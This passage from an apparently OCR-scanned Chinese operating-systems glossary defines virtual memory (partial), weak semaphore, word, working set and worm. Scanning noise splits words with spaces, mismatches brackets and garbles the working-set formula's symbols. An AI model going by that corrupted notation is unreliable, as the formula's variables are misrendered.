间 。 在 这 种 计算 机 系统 中 , 虚 地 址 可 以 映射 到 实地 址 。 虚 拟 存储 器 的 大 小 受 限 于 计算 机 系统 
的 编 址 方案 以 及 可 用 辅助 存储 器 的 大 小 ， 而 与 内 存储 单元 的 实际 数目 无 关 。 

weak semaphore〈 弱 信号 量 ) ”所 有 在 同一 个 信号 量 上 等 待 的 进程 按 未 指定 的 顺序 〈 即 执行 顺 
序 是 不 知道 的 或 者 不 确定 的 ) 继续 进行 的 一 种 信号 量 机 制 。 

word (F) 有 序 的 字 节 或 位 的 集合 ， 是 信息 能 在 特定 的 计算 机 上 进行 存储 、 发 送 或 操作 的 标 
准 单元 。 通 常 ， 如 果 处 理 器 有 一 个 固定 长 度 的 指令 集 ， 则 指令 的 长 度 等 于 字 的 长 度 。 

working set (TE) ”一 个 进程 在 虚拟 时 间 :， 参 数 为 A 的 工作 集 W(t:，A )， 是 该 进程 在 最 后 
A 个 时 间 单 位 中 被 访问 到 的 页 的 集合 。 相 对 于 resident set. 

worm CRA) ”可 以 通过 网 络 从 一 - 台 计 算 机 传播 到 另 一 台 计 算 机 的 程序 ， 许多 这 种 程序 都 含有 
病毒 。 
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